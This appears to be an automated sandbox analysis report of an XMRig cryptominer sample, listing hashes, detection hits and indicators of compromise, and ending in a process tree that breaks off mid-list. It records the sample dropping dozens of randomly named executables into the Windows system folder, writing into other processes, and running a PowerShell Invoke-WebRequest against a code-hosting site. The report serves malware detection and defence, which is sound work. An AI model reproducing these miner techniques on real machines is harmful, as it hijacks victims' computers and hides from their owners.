xmrig | cb5374470a20e590375b6d1cdab3c9416a3130902347fba5e252bc2bc72d9098

Analysis

max time kernel
92s
max time network
93s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
07/06/2024, 08:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
Size

1.8MB
MD5

4359b447011b228c17bdd32c3ce79760
SHA1

48d2d7cfbdb1dbce5c5da1a4112d2f6124a5e4fd
SHA256

cb5374470a20e590375b6d1cdab3c9416a3130902347fba5e252bc2bc72d9098
SHA512

9975076e37255b6b0b1f3dc9eaf4141fa263f0246d1f54dea1b6d916b5b97fdadf2e182a101e456bc5b1fd48458ab6fc99c97626d69314a5808a0791ecf3069f
SSDEEP

49152:Lz071uv4BPMkHC0IaSEzQR4iRFlX+IAD5qOp9:NABV

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 49 IoCs

miner

resource	yara_rule
behavioral2/memory/4604-84-0x00007FF631AB0000-0x00007FF631EA2000-memory.dmp	xmrig
behavioral2/memory/228-93-0x00007FF6A7E10000-0x00007FF6A8202000-memory.dmp	xmrig
behavioral2/memory/4700-99-0x00007FF690D90000-0x00007FF691182000-memory.dmp	xmrig
behavioral2/memory/872-166-0x00007FF639380000-0x00007FF639772000-memory.dmp	xmrig
behavioral2/memory/2380-165-0x00007FF71AD00000-0x00007FF71B0F2000-memory.dmp	xmrig
behavioral2/memory/2112-159-0x00007FF62EB40000-0x00007FF62EF32000-memory.dmp	xmrig
behavioral2/memory/2848-153-0x00007FF660890000-0x00007FF660C82000-memory.dmp	xmrig
behavioral2/memory/3616-147-0x00007FF681170000-0x00007FF681562000-memory.dmp	xmrig
behavioral2/memory/2928-141-0x00007FF72C030000-0x00007FF72C422000-memory.dmp	xmrig
behavioral2/memory/3164-135-0x00007FF7B8210000-0x00007FF7B8602000-memory.dmp	xmrig
behavioral2/memory/5048-129-0x00007FF624860000-0x00007FF624C52000-memory.dmp	xmrig
behavioral2/memory/4252-117-0x00007FF663180000-0x00007FF663572000-memory.dmp	xmrig
behavioral2/memory/2028-111-0x00007FF72A880000-0x00007FF72AC72000-memory.dmp	xmrig
behavioral2/memory/1480-107-0x00007FF75BFD0000-0x00007FF75C3C2000-memory.dmp	xmrig
behavioral2/memory/2008-103-0x00007FF7BE560000-0x00007FF7BE952000-memory.dmp	xmrig
behavioral2/memory/4420-100-0x00007FF7E7FD0000-0x00007FF7E83C2000-memory.dmp	xmrig
behavioral2/memory/3140-98-0x00007FF70A130000-0x00007FF70A522000-memory.dmp	xmrig
behavioral2/memory/2084-97-0x00007FF7E47E0000-0x00007FF7E4BD2000-memory.dmp	xmrig
behavioral2/memory/1644-94-0x00007FF6512D0000-0x00007FF6516C2000-memory.dmp	xmrig
behavioral2/memory/1268-91-0x00007FF65CBF0000-0x00007FF65CFE2000-memory.dmp	xmrig
behavioral2/memory/4016-90-0x00007FF786AA0000-0x00007FF786E92000-memory.dmp	xmrig
behavioral2/memory/4472-86-0x00007FF7E5130000-0x00007FF7E5522000-memory.dmp	xmrig
behavioral2/memory/1512-64-0x00007FF761AD0000-0x00007FF761EC2000-memory.dmp	xmrig
behavioral2/memory/4420-2096-0x00007FF7E7FD0000-0x00007FF7E83C2000-memory.dmp	xmrig
behavioral2/memory/3828-2098-0x00007FF7B3FB0000-0x00007FF7B43A2000-memory.dmp	xmrig
behavioral2/memory/2008-2138-0x00007FF7BE560000-0x00007FF7BE952000-memory.dmp	xmrig
behavioral2/memory/1512-2140-0x00007FF761AD0000-0x00007FF761EC2000-memory.dmp	xmrig
behavioral2/memory/4604-2144-0x00007FF631AB0000-0x00007FF631EA2000-memory.dmp	xmrig
behavioral2/memory/4472-2143-0x00007FF7E5130000-0x00007FF7E5522000-memory.dmp	xmrig
behavioral2/memory/1268-2146-0x00007FF65CBF0000-0x00007FF65CFE2000-memory.dmp	xmrig
behavioral2/memory/1644-2150-0x00007FF6512D0000-0x00007FF6516C2000-memory.dmp	xmrig
behavioral2/memory/1480-2148-0x00007FF75BFD0000-0x00007FF75C3C2000-memory.dmp	xmrig
behavioral2/memory/4016-2159-0x00007FF786AA0000-0x00007FF786E92000-memory.dmp	xmrig
behavioral2/memory/228-2160-0x00007FF6A7E10000-0x00007FF6A8202000-memory.dmp	xmrig
behavioral2/memory/2028-2157-0x00007FF72A880000-0x00007FF72AC72000-memory.dmp	xmrig
behavioral2/memory/2084-2154-0x00007FF7E47E0000-0x00007FF7E4BD2000-memory.dmp	xmrig
behavioral2/memory/3140-2153-0x00007FF70A130000-0x00007FF70A522000-memory.dmp	xmrig
behavioral2/memory/4700-2162-0x00007FF690D90000-0x00007FF691182000-memory.dmp	xmrig
behavioral2/memory/2928-2169-0x00007FF72C030000-0x00007FF72C422000-memory.dmp	xmrig
behavioral2/memory/3164-2172-0x00007FF7B8210000-0x00007FF7B8602000-memory.dmp	xmrig
behavioral2/memory/3616-2174-0x00007FF681170000-0x00007FF681562000-memory.dmp	xmrig
behavioral2/memory/3828-2171-0x00007FF7B3FB0000-0x00007FF7B43A2000-memory.dmp	xmrig
behavioral2/memory/5048-2167-0x00007FF624860000-0x00007FF624C52000-memory.dmp	xmrig
behavioral2/memory/4252-2165-0x00007FF663180000-0x00007FF663572000-memory.dmp	xmrig
behavioral2/memory/872-2177-0x00007FF639380000-0x00007FF639772000-memory.dmp	xmrig
behavioral2/memory/2848-2183-0x00007FF660890000-0x00007FF660C82000-memory.dmp	xmrig
behavioral2/memory/2380-2180-0x00007FF71AD00000-0x00007FF71B0F2000-memory.dmp	xmrig
behavioral2/memory/2112-2182-0x00007FF62EB40000-0x00007FF62EF32000-memory.dmp	xmrig
behavioral2/memory/4420-2365-0x00007FF7E7FD0000-0x00007FF7E83C2000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	804	powershell.exe
10	804	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
804	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2008	wNpgUAn.exe
1512	FchihbA.exe
4604	wsaiTqR.exe
4472	puOcrwO.exe
4016	mQiwPvb.exe
1480	WiKtrJx.exe
1268	ejCMevZ.exe
228	zkoUWEC.exe
1644	fTFRBmG.exe
2028	vosLNpi.exe
2084	oUxKbRO.exe
3140	mmYKhIS.exe
4700	tumoayq.exe
4420	QmSkEJM.exe
4252	VXhtUQg.exe
5048	oRsmDmk.exe
3164	qVNTlEp.exe
3828	dAwCgAv.exe
2928	GekvfTO.exe
3616	WgHlNuV.exe
2848	UKOrcHl.exe
2112	puAKfHd.exe
2380	uXksrPr.exe
872	ELRCwRC.exe
1828	jmDgLNq.exe
3588	cGNiZVu.exe
1488	sFTDQiJ.exe
1492	ZKtDtmi.exe
3044	lwNhOtx.exe
3112	OnludEV.exe
3144	EnaeIMP.exe
3476	QUhkPgj.exe
2720	JQkSJQG.exe
2016	xxTccXb.exe
2384	DnrscBL.exe
212	KYOIhgz.exe
2300	kKZxXLQ.exe
1168	kLhlTnk.exe
4904	fuUvZca.exe
4376	wpIfkiU.exe
2660	qEGFqdt.exe
768	vqiGrkE.exe
1684	YPiocTP.exe
1348	UjVdgYn.exe
556	ZDFBIzb.exe
3876	nrgLBUN.exe
3892	ehAxCQb.exe
2076	ofESwGn.exe
1596	zZlnYsp.exe
4884	riIuEOf.exe
4092	AzTatml.exe
3304	UbhwWVg.exe
3888	fJjYmhc.exe
3200	IDktmCV.exe
5060	RmdCsRP.exe
3208	YNaFcYS.exe
4628	DcOpuWe.exe
1260	KsRNPVb.exe
3408	UsmpyZc.exe
4500	Xebrzmx.exe
4200	oiBqQBn.exe
4076	PUTAcsF.exe
4236	BlFQAhT.exe
3716	zDHFCuR.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3176-0-0x00007FF7D2C40000-0x00007FF7D3032000-memory.dmp	upx
behavioral2/files/0x000a0000000233b6-6.dat	upx
behavioral2/files/0x00070000000233be-10.dat	upx
behavioral2/files/0x00070000000233bf-16.dat	upx
behavioral2/files/0x00070000000233c1-23.dat	upx
behavioral2/files/0x00070000000233c2-30.dat	upx
behavioral2/files/0x00070000000233c3-33.dat	upx
behavioral2/files/0x00070000000233c5-49.dat	upx
behavioral2/files/0x00070000000233c9-79.dat	upx
behavioral2/memory/4604-84-0x00007FF631AB0000-0x00007FF631EA2000-memory.dmp	upx
behavioral2/files/0x00070000000233cc-87.dat	upx
behavioral2/memory/228-93-0x00007FF6A7E10000-0x00007FF6A8202000-memory.dmp	upx
behavioral2/files/0x00080000000233c8-95.dat	upx
behavioral2/memory/4700-99-0x00007FF690D90000-0x00007FF691182000-memory.dmp	upx
behavioral2/files/0x00080000000233bb-104.dat	upx
behavioral2/files/0x00080000000233c7-118.dat	upx
behavioral2/memory/3828-128-0x00007FF7B3FB0000-0x00007FF7B43A2000-memory.dmp	upx
behavioral2/files/0x00070000000233cf-136.dat	upx
behavioral2/files/0x00070000000233d4-167.dat	upx
behavioral2/files/0x00070000000233d6-177.dat	upx
behavioral2/files/0x00070000000233db-194.dat	upx
behavioral2/files/0x00070000000233dc-199.dat	upx
behavioral2/files/0x00070000000233da-197.dat	upx
behavioral2/files/0x00070000000233d9-192.dat	upx
behavioral2/files/0x00070000000233d8-187.dat	upx
behavioral2/files/0x00070000000233d7-182.dat	upx
behavioral2/files/0x00070000000233d5-172.dat	upx
behavioral2/memory/872-166-0x00007FF639380000-0x00007FF639772000-memory.dmp	upx
behavioral2/memory/2380-165-0x00007FF71AD00000-0x00007FF71B0F2000-memory.dmp	upx
behavioral2/files/0x00070000000233d3-160.dat	upx
behavioral2/memory/2112-159-0x00007FF62EB40000-0x00007FF62EF32000-memory.dmp	upx
behavioral2/files/0x00070000000233d2-154.dat	upx
behavioral2/memory/2848-153-0x00007FF660890000-0x00007FF660C82000-memory.dmp	upx
behavioral2/files/0x00070000000233d1-148.dat	upx
behavioral2/memory/3616-147-0x00007FF681170000-0x00007FF681562000-memory.dmp	upx
behavioral2/files/0x00070000000233d0-142.dat	upx
behavioral2/memory/2928-141-0x00007FF72C030000-0x00007FF72C422000-memory.dmp	upx
behavioral2/memory/3164-135-0x00007FF7B8210000-0x00007FF7B8602000-memory.dmp	upx
behavioral2/files/0x00070000000233ce-130.dat	upx
behavioral2/memory/5048-129-0x00007FF624860000-0x00007FF624C52000-memory.dmp	upx
behavioral2/files/0x00070000000233cd-123.dat	upx
behavioral2/memory/4252-117-0x00007FF663180000-0x00007FF663572000-memory.dmp	upx
behavioral2/memory/2028-111-0x00007FF72A880000-0x00007FF72AC72000-memory.dmp	upx
behavioral2/memory/1480-107-0x00007FF75BFD0000-0x00007FF75C3C2000-memory.dmp	upx
behavioral2/memory/2008-103-0x00007FF7BE560000-0x00007FF7BE952000-memory.dmp	upx
behavioral2/memory/4420-100-0x00007FF7E7FD0000-0x00007FF7E83C2000-memory.dmp	upx
behavioral2/memory/3140-98-0x00007FF70A130000-0x00007FF70A522000-memory.dmp	upx
behavioral2/memory/2084-97-0x00007FF7E47E0000-0x00007FF7E4BD2000-memory.dmp	upx
behavioral2/memory/1644-94-0x00007FF6512D0000-0x00007FF6516C2000-memory.dmp	upx
behavioral2/memory/1268-91-0x00007FF65CBF0000-0x00007FF65CFE2000-memory.dmp	upx
behavioral2/memory/4016-90-0x00007FF786AA0000-0x00007FF786E92000-memory.dmp	upx
behavioral2/memory/4472-86-0x00007FF7E5130000-0x00007FF7E5522000-memory.dmp	upx
behavioral2/files/0x00070000000233cb-83.dat	upx
behavioral2/files/0x00070000000233ca-81.dat	upx
behavioral2/files/0x00070000000233c6-77.dat	upx
behavioral2/memory/1512-64-0x00007FF761AD0000-0x00007FF761EC2000-memory.dmp	upx
behavioral2/files/0x00070000000233c4-58.dat	upx
behavioral2/files/0x00070000000233c0-27.dat	upx
behavioral2/memory/4420-2096-0x00007FF7E7FD0000-0x00007FF7E83C2000-memory.dmp	upx
behavioral2/memory/3828-2098-0x00007FF7B3FB0000-0x00007FF7B43A2000-memory.dmp	upx
behavioral2/memory/2008-2138-0x00007FF7BE560000-0x00007FF7BE952000-memory.dmp	upx
behavioral2/memory/1512-2140-0x00007FF761AD0000-0x00007FF761EC2000-memory.dmp	upx
behavioral2/memory/4604-2144-0x00007FF631AB0000-0x00007FF631EA2000-memory.dmp	upx
behavioral2/memory/4472-2143-0x00007FF7E5130000-0x00007FF7E5522000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\YIUbsnu.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\PCeOZOt.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\MAlxOUm.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\DylKuIY.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\updtTIv.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\hLJbAQm.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\onvUhPH.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\VsNsScQ.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\jFkXiUA.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\TBqtmrN.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\ZieVdmx.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\XrKuuoW.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\GPnoGZb.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\AtTxXcD.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\hUUvRbX.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\yvfrtiM.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\ESUIumS.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\puAKfHd.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\RXpEUUj.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\EXSASrZ.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\pkyhzaZ.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\QiAMNAV.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\IMjBAyY.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\FDAiYpA.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\PAMmVKe.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\ZjHCiQw.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\CLSFCYS.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\rNAuZuI.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\HKOegwt.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\lGDPxrL.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\oWMDUCX.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\gHpcWaq.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\QcQPwre.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\zZlnYsp.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\rNNnMAu.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\LucEfUa.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\igKlKZV.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\PfHmYQz.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\dyURbcd.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\PUTAcsF.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\vIiMPXa.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\RnqJDLb.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\bAxwvyT.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\urkVnur.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\YJMGYEy.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\LJmUdtN.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\efDdAQz.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\QRUyMiA.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\dCxbMoM.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\wrIJxmi.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\VbpgYJB.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\wRQLsIa.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\WXisWRT.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\oRqFybr.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\ZchYnSh.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\JFgXrHw.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\MqGtFwf.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\OWFLbWJ.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\sIZivNA.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\VfsLGpI.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\ErgUvlK.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\sATltEM.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\iJWphDw.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
File created	C:\Windows\System\AvneZhU.exe	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
804	powershell.exe
804	powershell.exe
804	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	804	powershell.exe
Token: SeLockMemoryPrivilege	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3176 wrote to memory of 804	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	84
PID 3176 wrote to memory of 804	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	84
PID 3176 wrote to memory of 2008	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	85
PID 3176 wrote to memory of 2008	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	85
PID 3176 wrote to memory of 1512	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	86
PID 3176 wrote to memory of 1512	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	86
PID 3176 wrote to memory of 4604	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	87
PID 3176 wrote to memory of 4604	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	87
PID 3176 wrote to memory of 4472	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	88
PID 3176 wrote to memory of 4472	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	88
PID 3176 wrote to memory of 4016	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	89
PID 3176 wrote to memory of 4016	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	89
PID 3176 wrote to memory of 1480	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	90
PID 3176 wrote to memory of 1480	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	90
PID 3176 wrote to memory of 1268	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	91
PID 3176 wrote to memory of 1268	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	91
PID 3176 wrote to memory of 1644	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	92
PID 3176 wrote to memory of 1644	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	92
PID 3176 wrote to memory of 228	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	93
PID 3176 wrote to memory of 228	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	93
PID 3176 wrote to memory of 2028	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	94
PID 3176 wrote to memory of 2028	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	94
PID 3176 wrote to memory of 2084	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	95
PID 3176 wrote to memory of 2084	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	95
PID 3176 wrote to memory of 3140	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	96
PID 3176 wrote to memory of 3140	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	96
PID 3176 wrote to memory of 4700	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	97
PID 3176 wrote to memory of 4700	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	97
PID 3176 wrote to memory of 4420	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	98
PID 3176 wrote to memory of 4420	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	98
PID 3176 wrote to memory of 4252	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	99
PID 3176 wrote to memory of 4252	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	99
PID 3176 wrote to memory of 5048	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	100
PID 3176 wrote to memory of 5048	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	100
PID 3176 wrote to memory of 3164	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	101
PID 3176 wrote to memory of 3164	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	101
PID 3176 wrote to memory of 3828	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	102
PID 3176 wrote to memory of 3828	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	102
PID 3176 wrote to memory of 2928	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	103
PID 3176 wrote to memory of 2928	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	103
PID 3176 wrote to memory of 3616	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	104
PID 3176 wrote to memory of 3616	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	104
PID 3176 wrote to memory of 2848	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	105
PID 3176 wrote to memory of 2848	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	105
PID 3176 wrote to memory of 2112	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	106
PID 3176 wrote to memory of 2112	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	106
PID 3176 wrote to memory of 2380	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	107
PID 3176 wrote to memory of 2380	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	107
PID 3176 wrote to memory of 872	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	108
PID 3176 wrote to memory of 872	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	108
PID 3176 wrote to memory of 1828	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	109
PID 3176 wrote to memory of 1828	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	109
PID 3176 wrote to memory of 3588	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	110
PID 3176 wrote to memory of 3588	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	110
PID 3176 wrote to memory of 1488	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	111
PID 3176 wrote to memory of 1488	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	111
PID 3176 wrote to memory of 1492	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	112
PID 3176 wrote to memory of 1492	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	112
PID 3176 wrote to memory of 3044	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	113
PID 3176 wrote to memory of 3044	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	113
PID 3176 wrote to memory of 3112	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	114
PID 3176 wrote to memory of 3112	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	114
PID 3176 wrote to memory of 3144	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	115
PID 3176 wrote to memory of 3144	3176	4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe	115

C:\Users\Admin\AppData\Local\Temp\4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\4359b447011b228c17bdd32c3ce79760_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:804
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "804" "2964" "2916" "2968" "0" "0" "2972" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:2068
- C:\Windows\System\wNpgUAn.exe
  C:\Windows\System\wNpgUAn.exe
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Windows\System\FchihbA.exe
  C:\Windows\System\FchihbA.exe
  2⤵
  - Executes dropped EXE
  PID:1512
- C:\Windows\System\wsaiTqR.exe
  C:\Windows\System\wsaiTqR.exe
  2⤵
  - Executes dropped EXE
  PID:4604
- C:\Windows\System\puOcrwO.exe
